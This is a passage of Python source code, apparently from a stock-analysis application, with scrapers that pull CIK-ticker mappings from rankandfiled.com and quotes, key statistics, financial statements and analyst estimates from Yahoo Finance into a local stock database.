#################### Rank and Filed Scrapers "_rd" ##############################################
def download_cik_ticker_csv_mapping():
headers = config.HEADERS
url = "http://rankandfiled.com/static/export/cik_ticker.csv"
response = Request(url, headers=headers)
try:
page = urlopen(response)
except urllib.error.HTTPError as e:
logging.info(e.fp.read())
content = page.read()
return content
def parse_cik_ticker_mapping(rf_content):
content = rf_content.splitlines()
# ['CIK','Name','Ticker','Exchange','SIC','Business','Incorporated','Industry','IRS']
reference_list = []
ticker_keyed_cik_data_dict = {}
for line in content:
decoded_line = line.decode("utf-8")
if decoded_line.startswith("CIK"):
reference_list = [ '{}'.format(line) for line in decoded_line.split('|')]
continue
dummy_list = decoded_line.split('|')
parsed_dummy_list = []
for datum in dummy_list:
if datum:
formatted_datum = datum.strip()
else:
formatted_datum = None
parsed_dummy_list.append(formatted_datum)
mapping_dict = {x:y for x,y in zip(reference_list, parsed_dummy_list)}
ticker_keyed_cik_data_dict[mapping_dict.get("Ticker")] = mapping_dict
logging.warning("pprint next line")
pp.pprint(ticker_keyed_cik_data_dict)
return ticker_keyed_cik_data_dict
def add_cik_data_to_stocks(ticker_keyed_cik_data_dict):
with db.db.transaction() as connection:
for ticker_key, value_dict in ticker_keyed_cik_data_dict.items():
stock = utils.return_stock_by_symbol(ticker_key)
if not stock:
if value_dict.get("Exchange"):
if value_dict.get("Name"):
stock = db.create_new_Stock_if_it_doesnt_exist(ticker_key, firm_name=str(value_dict.get("Name")).strip())
else:
stock = db.create_new_Stock_if_it_doesnt_exist(ticker_key)
else:
continue
for subkey, subvalue in value_dict.items():
if subvalue:
if subkey == "CIK":
# set a CIK attribute
db.set_Stock_attribute(stock, "cik", int(subvalue), "", connection=True)
db.set_Stock_attribute(stock, subkey, subvalue, "_rf", connection=True)
db.pack_if_necessary()
def download_and_save_cik_ticker_mappings():
rf_content = download_cik_ticker_csv_mapping()
ticker_keyed_cik_data_dict = parse_cik_ticker_mapping(rf_content)
add_cik_data_to_stocks(ticker_keyed_cik_data_dict)
#################### Yahoo Finance Scrapers "_yf" ##############################################
def scrape_loop_for_missing_portfolio_stocks(ticker_list = [], update_regardless_of_recent_updates = False):
if config.SCRAPE_LOOP_QUEUE:
ticker_list = config.SCRAPE_LOOP_QUEUE + ticker_list
if not ticker_list:
return
if len(ticker_list) > config.SCRAPE_CHUNK_LENGTH:
ticker_list, overflow = ticker_list[:config.SCRAPE_CHUNK_LENGTH], ticker_list[config.SCRAPE_CHUNK_LENGTH:]
config.SCRAPE_LOOP_QUEUE = overflow
if (float(time.time()) - float(config.SCRAPE_SLEEP_TIME) > float(config.SCRAPE_LOOP_STARTED)):
config.SCRAPE_LOOP_STARTED = float(time.time())
ticker_chunk_list_triple = prepareYqlScrape(ticker_list, update_regardless_of_recent_updates = update_regardless_of_recent_updates)
chunk_list = ticker_chunk_list_triple[0]
for i in range(len(chunk_list)):
data = executeYqlScrapePartOne(chunk_list, i)
executeYqlScrapePartTwo(chunk_list, i, data)
else:
sleep_time_left = float(time.time()) - config.SCRAPE_LOOP_STARTED
time.sleep(sleep_time_left)
scrape_loop_for_missing_portfolio_stocks(ticker_list = ticker_list)
def prepareYqlScrape(ticker_list = [], update_regardless_of_recent_updates = False): # from finance.yahoo.com
"returns [chunk_list, percent_of_full_scrape_done, number_of_tickers_to_scrape"
chunk_length = config.SCRAPE_CHUNK_LENGTH # 145 appears to be the longest url string i can query with, but 50 seems more stable
yql_ticker_list = []
if not ticker_list: # added so you can update limited tickers
for ticker in config.GLOBAL_STOCK_DICT:
if config.GLOBAL_STOCK_DICT.get(ticker):
ticker_list.append(ticker)
# Check if stock has already been recently update (this is important to prevent overscraping yahoo)
for ticker in sorted(ticker_list):
stock = utils.return_stock_by_symbol(ticker) # initially we need only return stocks by ticker, later we will need to use the yql specific symbols
if stock:
time_since_update = float(time.time()) - stock.last_yql_basic_scrape_update
if (int(time_since_update) < int(config.TIME_ALLOWED_FOR_BEFORE_RECENT_UPDATE_IS_STALE)) and not update_regardless_of_recent_updates:
logging.warning("Will not add %s to update list, updated too recently, waste of yql query" % str(stock.symbol))
continue
if stock:
yql_ticker_list.append(stock.yql_ticker)
else:
logging.info("Something is off with a stock, it's not returning properly")
yql_ticker_list.append(ticker)
num_of_tickers = len(yql_ticker_list)
sleep_time = config.SCRAPE_SLEEP_TIME
# self.progress_bar.SetValue(0)
# self.progress_bar.Show()
# global app
# app.Yield() # this updates the gui within a script (it must be here, or the progress bar will not show till the function finishes, also below for updates)
slice_start = 0
slice_end = chunk_length
# this is a very important number
# approx 200 calls per hour (yql forums info)
# 3600 seconds in an hour
# 3600 / 200 = 18 seconds pause per query to stay under the 200/hour limit
if chunk_length < 1:
logging.error("chunk_length too small, will create infinite loop")
return
# Now set up the last chunk, which will be smaller, and unique.
count = 0
last_loop = False
chunk_list = []
while slice_end < (num_of_tickers + (chunk_length)):
if slice_end > num_of_tickers:
slice_end = num_of_tickers
last_loop = True
data = None
data2= None
logging.info('While loop #%d' % count)
ticker_chunk = yql_ticker_list[slice_start:slice_end]
chunk_list.append(ticker_chunk)
count += 1
#logging.info(count)
slice_start += chunk_length
slice_end += chunk_length
#logging.info("got this far")
#self.progress_dialog = wx.ProgressDialog('Scrape Progress',
# 'The stocks are currently downloading',
# num_of_tickers,
# parent=self,
# style=wx.PD_CAN_ABORT|wx.PD_REMAINING_TIME
# )
number_of_tickers_in_chunk_list = 0
for chunk in chunk_list:
for ticker in chunk:
number_of_tickers_in_chunk_list += 1
logging.info("Number of tickers to scrape: {}".format(number_of_tickers_in_chunk_list))
number_of_tickers_previously_updated = len(ticker_list) - number_of_tickers_in_chunk_list
logging.info(number_of_tickers_previously_updated)
total_number_of_tickers_done = number_of_tickers_previously_updated
percent_of_full_scrape_done = round(100 * float(total_number_of_tickers_done) / float(len(ticker_list)) )
logging.info(str(percent_of_full_scrape_done) + "%%" +" already done")
return [chunk_list, percent_of_full_scrape_done, number_of_tickers_in_chunk_list]
def executeYqlScrapePartOne(ticker_chunk_list, position_of_this_chunk):
sleep_time = config.SCRAPE_SLEEP_TIME
ticker_chunk = ticker_chunk_list[position_of_this_chunk]
logging.info(ticker_chunk)
if ticker_chunk:
scrape_1_failed = False
try:
data = pyql.lookupQuote(ticker_chunk)
except:
logging.warning("Scrape didn't work. Nothing scraped.")
scrape_1_failed = True
if scrape_1_failed:
#time.sleep(sleep_time)
return
else:
logging.info("Scrape 1 Success: mid-scrape sleep for %d seconds" % sleep_time)
return data
def executeYqlScrapePartTwo(ticker_chunk_list, position_of_this_chunk, successful_pyql_data): # This is the big one
sleep_time = config.SCRAPE_SLEEP_TIME
ticker_chunk = ticker_chunk_list[position_of_this_chunk]
number_of_stocks_in_this_scrape = len(ticker_chunk)
data = successful_pyql_data
try:
data2 = pyql.lookupKeyStats(ticker_chunk)
except:
logging.warning("Scrape 2 didn't work. Abort.")
time.sleep(sleep_time)
return
for stock in data:
new_stock = None
for key, value in stock.items():
if key == "symbol":
new_stock = utils.return_stock_by_yql_symbol(value) # must use yql return here for ticker that include a "^" or "/", a format yahoo finance does not use.
if not new_stock:
# this should not, ever, happen:
logging.error("New Stock should not need to be created here, but we are going to create it anyway, there is a problem with the yql ticker %s" % value)
new_stock = db.create_new_Stock_if_it_doesnt_exist(value)
else:
new_stock.updated = datetime.datetime.now()
new_stock.epoch = float(time.time())
for key, value in stock.items():
# Here we hijack the power of the python object structure
# This adds the attribute of every possible attribute that can be passed
if key == "symbol":
continue # already have this, don't need it again, in fact, the yql symbol is different for many terms
db.set_Stock_attribute(new_stock, str(key), value, "_yf")
logging.info("Success, saving %s: Data 1 (Yahoo Quote)" % new_stock.yql_ticker)
#save
db.save_GLOBAL_STOCK_DICT()
for stock2 in data2:
for key, value in stock2.items():
if key == "symbol":
new_stock = utils.return_stock_by_yql_symbol(value)
if not new_stock:
# this should not, ever, happen:
logging.error("New Stock should not need to be created here, but we are going to create it anyway, there is a problem with the yql ticker %s" % value)
new_stock = db.create_new_Stock_if_it_doesnt_exist(value)
for key, value in stock2.items():
if key == "symbol":
continue # already have this, don't need it again, in fact, the yql symbol is different for many terms
if isinstance(value, (list, dict)):
#logging.warning(type(value))
x = repr(value)
term = None
content = None
#logging.warning(x)
if x[0] == "[":
y = ast.literal_eval(x)
#logging.warning(y)
for i in y:
try:
test = i["term"]
test = i["content"]
except Exception as e:
#logging.error(new_stock.symbol)
#logging.error(y)
#logging.error("Seems to be [Trailing Annual Dividend Yield, Trailing Annual Dividend Yield%]")
continue
#logging.warning(i)
try:
key_str = str(key)
date = None
date_str = None
term = str(i["term"])
term = term.replace(" ", "_")
term = term.replace(",", "")
term = utils.strip_string_whitespace(term)
key_term = key_str + "_" + term
key_term = utils.strip_string_whitespace(key_term)
if "p_52_WeekHigh" in key_term:
date = key_term[14:]
date_str = "p_52_WeekHigh_Date"
key_str = "p_52_WeekHigh"
elif "p_52_WeekLow" in key_term:
date = key_term[13:]
date_str = "p_52_WeekLow_Date"
key_str = "p_52_WeekLow"
elif "ForwardPE_fye" in key_term:
date = key_term[14:]
date_str = "ForwardPE_fiscal_y_end_Date"
key_str = "ForwardPE"
elif "EnterpriseValue_" in key_term:
date = key_term[16:]
date_str = "EnterpriseValue_Date"
key_str = "EnterpriseValue"
elif "TrailingPE_ttm_" in key_term:
date = key_term[15:] # will be of form TrailingPE_ttm__intraday
date_str = "TrailingPE_ttm_Date"
key_str = "TrailingPE_ttm"
elif "SharesShort_as_of" in key_term:
date = key_term[18:] # will be of form SharesShort_as_of_Jul_15__2013
date_str = "SharesShort_as_of_Date"
key_str = "SharesShort"
elif "ShortRatio_as_of" in key_term:
date = key_term[16:] # will be of form SharesShort_as_of_Jul_15__2013
date_str = "ShortRatio_as_of_Date"
key_str = "ShortRatio"
elif "ShortPercentageofFloat_as_of" in key_term:
date = key_term[29:]
date_str = "ShortPercentageofFloat_as_of_Date"
key_str = "ShortPercentageofFloat"
else:
date = None
date_str = None
key_str = str(key + "_" + term)
content = str(i["content"])
db.set_Stock_attribute(new_stock, key_str, content, "_yf")
if date_str:
db.set_Stock_attribute(new_stock, date_str, date, "_yf")
except Exception as e:
line_number()
logging.warning(repr(i))
logging.warning("complex list method did not work")
logging.exception(e)
db.set_Stock_attribute(new_stock, str(key), x, "_yf")
elif x[0] == "{":
y = ast.literal_eval(x)
try:
test = y["term"]
test = y["content"]
except Exception as e:
#logging.error(new_stock.symbol)
#logging.error(y)
#logging.error("Seems to be [Trailing Annual Dividend Yield, Trailing Annual Dividend Yield%]")
continue
#logging.warning(y)
try:
key_str = str(key)
date = None
date_str = None
term = str(y["term"])
term = term.replace(" ", "_")
term = term.replace(",", "")
term = utils.strip_string_whitespace(term)
key_term = key_str + "_" + term
key_term = utils.strip_string_whitespace(key_term)
if "p_52_WeekHigh" in key_term:
date = key_term[14:]
date_str = "p_52_WeekHigh_Date"
key_str = "p_52_WeekHigh"
elif "p_52_WeekLow" in key_term:
date = key_term[13:]
date_str = "p_52_WeekLow_Date"
key_str = "p_52_WeekLow"
elif "ForwardPE_fye" in key_term:
date = key_term[14:]
date_str = "ForwardPE_fiscal_y_end_Date"
key_str = "ForwardPE"
elif "EnterpriseValue_" in key_term:
date = key_term[16:]
date_str = "EnterpriseValue_Date"
key_str = "EnterpriseValue"
elif "TrailingPE_ttm_" in key_term:
date = key_term[15:] # will be of form TrailingPE_ttm__intraday
date_str = "TrailingPE_ttm_Date"
key_str = "TrailingPE_ttm"
elif "SharesShort_as_of" in key_term:
date = key_term[18:] # will be of form SharesShort_as_of_Jul_15__2013
date_str = "SharesShort_as_of_Date"
key_str = "SharesShort"
elif "ShortRatio_as_of" in key_term:
date = key_term[16:] # will be of form SharesShort_as_of_Jul_15__2013
date_str = "ShortRatio_as_of_Date"
key_str = "ShortRatio"
elif "ShortPercentageofFloat_as_of" in key_term:
date = key_term[29:]
date_str = "ShortPercentageofFloat_as_of_Date"
key_str = "ShortPercentageofFloat"
else:
key_str = str(key + "_" + term)
content = str(y["content"])
db.set_Stock_attribute(new_stock, key_str, content, "_yf")
if date_str:
db.set_Stock_attribute(new_stock, date_str, date, "_yf")
except Exception as e:
logging.warning("complex dict method did not work")
logging.exception(e)
db.set_Stock_attribute(new_stock, str(key), x, "_yf")
else:
key_str = str(key)
db.set_Stock_attribute(new_stock, key_str, x, "_yf")
else:
key_str = str(key)
db.set_Stock_attribute(new_stock, key_str, value, "_yf")
new_stock.last_yql_basic_scrape_update = float(time.time())
logging.info("Success, saving %s: Data 2 (Yahoo Key Statistics)" % new_stock.yql_ticker)
#save again
db.save_GLOBAL_STOCK_DICT()
logging.info("This stock chunk finished successfully.")
#self.progress_bar.SetValue((float(slice_end)/float(num_of_tickers)) * 100)
#app.Yield()
def yqlQuickStockQuoteScrape(ticker_list): # len < 50
if len(ticker_list) > 50:
logging.warning("too many tickers to scrape, using this method, please do a full scrape")
return
data = None
try:
data = pyql.lookupQuote(ticker_list)
except:
logging.warning("Scrape didn't work. Nothing scraped.")
if data:
logging.info("Scrape Success")
return data
for stock in data:
new_stock = None
for key, value in stock.items():
if key == "symbol":
new_stock = utils.return_stock_by_yql_symbol(value) # must use yql return here for ticker that include a "^" or "/", a format yahoo finance does not use.
if not new_stock:
# this should not, ever, happen:
logging.error("New Stock should not need to be created here, but we are going to create it anyway, there is a problem with the yql ticker %s" % value)
new_stock = db.create_new_Stock_if_it_doesnt_exist(value)
else:
new_stock.updated = datetime.datetime.now()
new_stock.epoch = float(time.time())
for key, value in stock.items():
# Here we hijack the power of the python object structure
# This adds the attribute of every possible attribute that can be passed
if key == "symbol":
continue # already have this, don't need it again, in fact, the yql symbol is different for many terms
db.set_Stock_attribute(new_stock, str(key), value, "_yf")
logging.info("Success, saving %s: Data (Yahoo Quote)" % new_stock.yql_ticker)
#save
db.save_GLOBAL_STOCK_DICT()
# Stock Annual Data Scraping Functions
# ---- unfortunately after scraping many stocks, these scraping functions need to be overhauled
# ---- it seems that the data that is returned is not formatted properly for firms that are < 4 years old
# ---- I'll need to account for this disparity and rewrite the scrape functions with more precision.
## --- Much has been improved, but i still need to do a re-write it for single year data.
def yf_annual_cash_flow_scrape(ticker):
logging.info("Starting: yf_annual_cash_flow_scrape for %s" % ticker)
stock = utils.return_stock_by_symbol(ticker)
if not stock:
logging.error("Error: stock %s does not exist" % ticker)
most_recent_update = stock.last_cash_flow_update_yf
last_acceptable_update = float(time.time()) - config.TIME_ALLOWED_FOR_BEFORE_RECENT_UPDATE_IS_STALE
if most_recent_update > last_acceptable_update:
logging.info("YF Cash flow data for %s is up to date." % ticker)
return
soup = BeautifulSoup(urlopen('http://finance.yahoo.com/q/cf?s=%s&annual' % ticker), "html.parser")
factor = 0
thousands = soup.body.findAll(text= "All numbers in thousands")
if thousands:
factor = 1000
if not factor:
logging.error("Error: no factor... in need of review")
table = soup.find("table", { "class" : "yfnc_tabledata1" })
data_list = []
find_all_data_in_table(table, "td", data_list, factor)
find_all_data_in_table(table, "strong", data_list, factor)
create_or_update_yf_StockAnnualData(ticker, data_list, "Cash_Flow")
cash_flow_layout = ['''
0 Period Ending
1 Period Ending
2 -
3 -
4 -
5 Operating Activities, Cash Flows Provided By or Used In
6 Depreciation
7 -
8 -
9 -
10 Adjustments To Net Income
11 -
12 -
13 -
14 Changes In Accounts Receivables
15 -
16 -
17 -
18 Changes In Liabilities
19 -
20 -
21 -
22 Changes In Inventories
23 -
24 -
25 -
26 Changes In Other Operating Activities
27 -
28 -
29 -
30 Investing Activities, Cash Flows Provided By or Used In
31 Capital Expenditures
32 -
33 -
34 -
35 Investments
36 -
37 -
38 -
39 Other Cash flows from Investing Activities
40 -
41 -
42 -
43 Financing Activities, Cash Flows Provided By or Used In
44 Dividends Paid
45 -
46 -
47 -
48 Sale Purchase of Stock
49 -
50 -
51 -
52 Net Borrowings
53 -
54 -
55 -
56 Other Cash Flows from Financing Activities
57 -
58 -
59 -
60 Effect Of Exchange Rate Changes
61 -
62 -
63 -
64 Net Income
65 -
66 -
67 -
68 Operating Activities, Cash Flows Provided By or Used In
69 Total Cash Flow From Operating Activities
70 -
71 -
72 -
73 Investing Activities, Cash Flows Provided By or Used In
74 Total Cash Flows From Investing Activities
75 -
76 -
77 -
78 Financing Activities, Cash Flows Provided By or Used In
79 Total Cash Flows From Financing Activities
80 -
81 -
82 -
83 Change In Cash and Cash Equivalents
84 -
85 -
86 -
''']
def yf_annual_income_statement_scrape(ticker):
logging.info("Starting: yf_annual_income_statement_scrape for %s" % ticker)
stock = utils.return_stock_by_symbol(ticker)
if not stock:
logging.error("Error: stock %s does not exist" % ticker)
most_recent_update = stock.last_income_statement_update_yf
last_acceptable_update = float(time.time()) - config.TIME_ALLOWED_FOR_BEFORE_RECENT_UPDATE_IS_STALE
if most_recent_update > last_acceptable_update:
logging.info("YF income statement data for %s is up to date." % ticker)
return
soup = BeautifulSoup(urlopen('http://finance.yahoo.com/q/is?s=%s&annual' % ticker), "html.parser")
factor = 0
thousands = soup.body.findAll(text= "All numbers in thousands")
if thousands:
factor = 1000
table = soup.find("table", { "class" : "yfnc_tabledata1" })
data_list = []
find_all_data_in_table(table, "td", data_list, factor)
find_all_data_in_table(table, "strong", data_list, factor)
create_or_update_yf_StockAnnualData(ticker, data_list, "Income_Statement")
income_statment_layout = ['''
0 Period Ending
1 Period Ending
2 Cost of Revenue
3 -
4 -
5 -
6 Operating Expenses
7 Research Development
8 -
9 -
10 -
11 Selling General and Administrative
12 -
13 -
14 -
15 Non Recurring
16 -
17 -
18 -
19 Others
20 -
21 -
22 -
23 Total Operating Expenses
24 -
25 -
26 -
27 Income from Continuing Operations
28 Total Other Income/Expenses Net
29 -
30 -
31 -
32 Earnings Before Interest And Taxes
33 -
34 -
35 -
36 Interest Expense
37 -
38 -
39 -
40 Income Before Tax
41 -
42 -
43 -
44 Income Tax Expense
45 -
46 -
47 -
48 Minority Interest
49 -
50 -
51 -
52 Net Income From Continuing Ops
53 -
54 -
55 -
56 Non-recurring Events
57 Discontinued Operations
58 -
59 -
60 -
61 Extraordinary Items
62 -
63 -
64 -
65 Effect Of Accounting Changes
66 -
67 -
68 -
69 Other Items
70 -
71 -
72 -
73 Preferred Stock And Other Adjustments
74 -
75 -
76 -
77 Total Revenue
78 -
79 -
80 -
81 Gross Profit
82 -
83 -
84 -
85 Operating Income or Loss
86 -
87 -
88 -
89 Net Income
90 -
91 -
92 -
93 Net Income Applicable To Common Shares
94 -
95 -
96 -
''']
def yf_annual_balance_sheet_scrape(ticker):
logging.info("Starting: yf_annual_balance_sheet_scrape for %s" % ticker)
stock = utils.return_stock_by_symbol(ticker)
if not stock:
logging.error("Error: stock %s does not exist" % ticker)
most_recent_update = stock.last_balance_sheet_update_yf
last_acceptable_update = float(time.time()) - config.TIME_ALLOWED_FOR_BEFORE_RECENT_UPDATE_IS_STALE
if most_recent_update > last_acceptable_update:
logging.info("YF balance sheet data for %s is up to date." % ticker)
return
soup = BeautifulSoup(urlopen('http://finance.yahoo.com/q/bs?s=%s&annual' % ticker), "html.parser")
factor = 0
thousands = soup.body.findAll(text= "All numbers in thousands")
if thousands:
factor = 1000
table = soup.find("table", { "class" : "yfnc_tabledata1" })
data_list = []
find_all_data_in_table(table, "td", data_list, factor)
find_all_data_in_table(table, "strong", data_list, factor)
create_or_update_yf_StockAnnualData(ticker, data_list, "Balance_Sheet")
balance_sheet_layout = ['''
0 Period Ending
1 Period Ending
2 Mar 31 2013
3 Mar 31 2012
4 Mar 31 2011
5 Assets
6 Current Assets
7 Cash And Cash Equivalents
8 4059000000
9 4047000000
10 3767000000
11 Short Term Investments
12 320000000
13 74000000
14 32000000
15 Net Receivables
16 1754000000
17 1524000000
18 1322000000
19 Inventory
20 -
21 -
22 -
23 Other Current Assets
24 391000000
25 300000000
26 206000000
27 Long Term Investments
28 72000000
29 2000000
30 5000000
31 Property Plant and Equipment
32 1191000000
33 1063000000
34 1086000000
35 Goodwill
36 364000000
37 195000000
38 185000000
39 Intangible Assets
40 68000000
41 34000000
42 11000000
43 Accumulated Amortization
44 -
45 -
46 -
47 Other Assets
48 245000000
49 236000000
50 326000000
51 Deferred Long Term Asset Charges
52 94000000
53 62000000
54 85000000
55 Liabilities
56 Current Liabilities
57 Accounts Payable
58 393000000
59 310000000
60 224000000
61 Short/Current Long Term Debt
62 -
63 9000000
64 -
65 Other Current Liabilities
66 765000000
67 618000000
68 592000000
69 Long Term Debt
70 -
71 -
72 -
73 Other Liabilities
74 27000000
75 22000000
76 72000000
77 Deferred Long Term Liability Charges
78 23000000
79 2000000
80 -
81 Minority Interest
82 -
83 -
84 -
85 Negative Goodwill
86 -
87 -
88 -
89 Stockholders' Equity
90 Misc Stocks Options Warrants
91 -
92 -
93 -
94 Redeemable Preferred Stock
95 -
96 -
97 -
98 Preferred Stock
99 -
100 -
101 -
102 Common Stock
103 64000000
104 64000000
105 64000000
106 Retained Earnings
107 7666000000
108 6509000000
109 5294000000
110 Treasury Stock
111 -
112 -
113 -
114 Capital Surplus
115 -
116 -
117 -
118 Other Stockholder Equity
119 -399000000
120 3000000
121 764000000
122 Assets
123 Total Current Assets
124 6505000000
125 5945000000
126 5312000000
127 Total Assets
128 8539000000
129 7537000000
130 7010000000
131 Liabilities
132 Total Current Liabilities
133 1158000000
134 937000000
135 816000000
136 Total Liabilities
137 1208000000
138 961000000
139 888000000
140 Stockholders' Equity
141 Total Stockholder Equity
142 -
143 -
144 -
145 Net Tangible Assets
146 -
147 -
148 -
''']
def find_all_data_in_table(table, str_to_find, data_list_to_append_to, table_factor=1):
if not table:
logging.error("No table when looking for {}".format(str_to_find))
return
for cell in table.findAll(str_to_find):
text = cell.find(text=True)
if text:
text = utils.strip_string_whitespace(text)
text = text.replace(u'\xa0', u' ')
text = str(text)
text = text.replace(',', "")
if text:
if text[0] == "(":
text_list = list(text)
text_list[0] = "-"
text_list[-1] = ""
text = "".join(text_list)
if utils.is_number(text):
text_float = float(text) * table_factor
if utils.relevant_float(text_float):
text = str(text_float)
else:
text = str(int(text_float))
#if text == "Period Ending":
# dates = table.findAll("th")
# for date in dates:
# logging.info(date)
if text:
#logging.info(text)
data_list_to_append_to.append(str(text))
def create_or_update_yf_StockAnnualData(ticker, data_list, data_type):
logging.info("--------------")
logging.info(data_type)
logging.info(len(data_list))
#logging.info(data_list)
# ?????????????????????????
stock = utils.return_stock_by_symbol(ticker)
if not stock:
logging.error("error in create_or_update_yf_StockAnnualData")
# yahoo balance sheet loop
default_amount_of_data = 3
cash_flow_data_positions = [1,6,10,14,18,22,26,31,35,39,44,48,52,56,60,64,69,74,79,83]
income_statement_data_postitions = [2,7,11,15,19,23,28,32,36,40,44,48,52,57,61,65,69,73,77,81,85,89,93]
balance_sheet_data_positions = [1,7,11,15,19,23,27,31,35,39,43,47,51,57,61,65,69,73,77,81,85,90,94,98,102,106,110,114,118,123,127,132,136,141,145]
# unless data list format is irregular
# What i'm doing here is complicated, if there are only two units of data
# in each data position i need to adjust the position of the list from which to grab
# the data. This is actually a fairly simple iteration.
# If the data is different by 1 unit of data per section
# the adjustment is to change the position by 1, for each section.
# This creates a compounding adjustment, increasing by 1 unit each time,
# made simple by increasing the adjustment variable each pass.
#logging.info("len(data_list) = {} {}".format(len(data_list), data_list))
if data_type == "Balance_Sheet" and len(data_list) == 117:#96:
logging.info("adjusting for 2 years worth of Balance_Sheet data")
default_amount_of_data = 2
adjusted_balance_sheet_data_positions = []
adjustment_variable = 0
for i in balance_sheet_data_positions:
adjusted_balance_sheet_data_positions.append(i - adjustment_variable)
adjustment_variable += 1
balance_sheet_data_positions = adjusted_balance_sheet_data_positions
#logging.info(balance_sheet_data_positions)
elif data_type == "Income_Statement" and len(data_list) == 74:#59:
logging.info("adjusting for 2 years worth of Income_Statement data")
default_amount_of_data = 2
adjusted_income_statement_data_positions = []
adjustment_variable = 0
for i in income_statement_data_postitions:
adjusted_income_statement_data_positions.append(i - adjustment_variable)
adjustment_variable += 1
income_statement_data_postitions = adjusted_income_statement_data_positions
#logging.info(income_statement_data_postitions)
elif data_type == "Cash_Flow" and len(data_list) == 67:
logging.info("adjusting for 2 years worth of Cash_Flow data")
default_amount_of_data = 2
adjusted_cash_flow_data_positions = []
adjustment_variable = 0
for i in cash_flow_data_positions:
adjusted_cash_flow_data_positions.append(i - adjustment_variable)
adjustment_variable += 1
cash_flow_data_positions = adjusted_cash_flow_data_positions
#logging.info(cash_flow_data_positions)
data_positions = []
if data_type == "Cash_Flow":
data_positions = cash_flow_data_positions
stock.last_cash_flow_update_yf = float(time.time())
elif data_type == "Balance_Sheet":
for i in data_list:
logging.info(i)
data_positions = balance_sheet_data_positions
stock.last_balance_sheet_update_yf = float(time.time())
elif data_type == "Income_Statement":
data_positions = income_statement_data_postitions
stock.last_income_statement_update_yf = float(time.time())
else:
logging.warning("no data type selected")
return
# First, define period
if stock:
for i in range(len(data_list)):
if i in data_positions:
attribute = str(data_list[i])
attribute = attribute.replace(" ","_")
attribute = attribute.replace("/","_")
attribute = attribute.replace("'","")
if attribute == "Period_Ending":
for j in range(default_amount_of_data):
data = data_list[i+j+1]
#logging.info(data)
data = data[-4:]
#logging.info(data)
try:
# if annual data periods for yahoo finance date doesn't exist, create it.
throw_error = stock.annual_data_periods_yf
except:
stock.annual_data_periods_yf = []
for k in range(default_amount_of_data):
stock.annual_data_periods_yf.append("")
stock.annual_data_periods_yf[j] = data
########
for i in range(len(data_list)):
if i in data_positions:
# attribute
attribute = str(data_list[i])
#logging.info(attribute)
attribute = attribute.replace(" ","_")
attribute = attribute.replace("/","_")
attribute = attribute.replace("'","")
if attribute == "Period_Ending":
attribute = attribute + "_For_" + data_type
attribute_data_list = []
#logging.info("default amount of data =", default_amount_of_data)
for j in range(default_amount_of_data):
data = data_list[i+j+1]
data = data.replace(",","")
#logging.info(data)
#try:
# data = int(data)
#except:
# # data is not a number
# pass
attribute_data_list.append(data)
### "year fail list" ### no longer relevant
# year_fail_list = ["", "20XX", "20YY"]
for k in range(default_amount_of_data):
year_list = ["", "_t1y", "_t2y"]
year = year_list[k]
db.set_Stock_attribute(stock, attribute + year, attribute_data_list[k], "_yf")
### I abandoned the method of years below,
### it seemed stupid in retrospect to put the years on the object.attributes
# year = ""
# if k != 0:
# year = stock.periods[k]
# if not year:
# year = year_fail_list[k]
# year = "_" + year
# #setattr(stock, attribute + year, attribute_data_list[k])
# db.set_Stock_attribute(stock, str(attribute + year, attribute_data_list[k], "_yf")
for attribute in dir(stock):
if not attribute.startswith("_"):
#logging.info(ticker+"."+attribute+": {}".format(getattr(stock, attribute)))
pass
db.save_GLOBAL_STOCK_DICT()
# Stock Analyst Estimates Scraping Functions
def yf_analyst_estimates_scrape(ticker):
logging.info("Starting: yf_analyst_estimates_scrape for %s" % ticker)
stock = utils.return_stock_by_symbol(ticker)
if not stock:
return
soup = BeautifulSoup(urlopen('https://finance.yahoo.com/quote/{}/analysts'.format(ticker)), "html.parser")
data_list = []
date_list = [None, None, None, None]
table = soup.findAll("table", { "class" : "yfnc_tableout1" })
logging.info("table: {} rows".format(len(table)))
if int(len(table)) == 0:
logging.info("there is either no data for %s, or something went wrong, you can check by visiting" % ticker)
logging.info('https://finance.yahoo.com/quote/{}/analysts'.format(ticker))
count = 0
for i in table:
rows = i.findChildren('tr')
logging.info("rows: {} columns".format(len(rows)))
for row in rows:
cells = row.findChildren(['strong','th','td','br'])
for cell in cells:
if len(cell.contents) == 3: #this is specifically to capture the quarter dates
date_period = cell.contents[0]
date_period = date_period.replace(" ","_")
date_period = date_period.replace("/","_")
date_period = date_period.replace(".","")
date_period = date_period.replace("'","")
date_period = str(date_period)
date_value = cell.contents[2]
date_value = date_value.replace(" ","_")
date_value = date_value.replace("/","_")
date_value = date_value.replace(".","")
date_value = date_value.replace("'","")
date_value = str(date_value)
#logging.info("{} {} {} {}".format(count, "|", date_period, "|", date_value))
count += 1
data = date_period
date_data = date_value
date_position = None
if date_period == "Current_Qtr":
date_position = 0
elif date_period == "Next_Qtr":
date_position = 1
elif date_period == "Current_Year":
date_position = 2
elif date_period == "Next_Year":
date_position = 3
if date_position is not None:
if date_list[date_position] is None:
date_list[date_position] = date_data
#logging.info(date_list)
elif date_list[date_position] != date_value:
logging.error("Error")
return
elif cell.string is not None:
value = cell.string
#logging.info("{} {} {}".format(count, "|", value))
count += 1
data = str(value)
else:
#logging.info(cell)
children = cell.findChildren()
for child in children:
value = child.string
if value is not None:
#logging.info("{} {} {}".format(count, "|", value))
count += 1
data = str(value)
else:
pass
# logging.info("{} {} {}".format(count, "|", child))
# count += 1
if data:
if data not in ["Current_Qtr", "Next_Qtr", "Current_Year", "Next_Year"]:
data_list.append(data)
data = None
standard_analyst_scrape_positions = [1, ]
heading_positions = [
1, # Earnings Est
28, # Revenue Est
60, # Earnings History
86, # EPS Trends
113,# EPS Revisions
135 # Growth Est
]
subheading_positions = [
2, 7, 12, 17, 22, # Earnings Est
29, 34, 39, 44, 49, 54, # Revenue Est
65, 70, 75, 80, # Earnings History
87, 92, 97, 102, 107, # EPS Trends
114, 119, 124, 129, # EPS Revisions
# this is where the special non-date related subheadings start
140, 145, 150, 155, 160, 165, 170, 175, # Growth Est
]
heading = None
subheading = None
date_period_list = ["Current_Qtr", "Next_Qtr", "Current_Year", "Next_Year"]
date_period_list_position = 0
earnings_history_date_locations = [heading_positions[2]+1, heading_positions[2]+2, heading_positions[2]+3, heading_positions[2]+4]
earnings_history_dates = ["12_months_ago", "9_months_ago", "6_months_ago", "3_months_ago"]
earnings_history_date_position = 0
growth_estimate_reference_locations = [heading_positions[-1]+1, heading_positions[-1]+2, heading_positions[-1]+3, heading_positions[-1]+4]
growth_estimate_references = ["Stock", "Industry", "Sector", "S&P_500"]
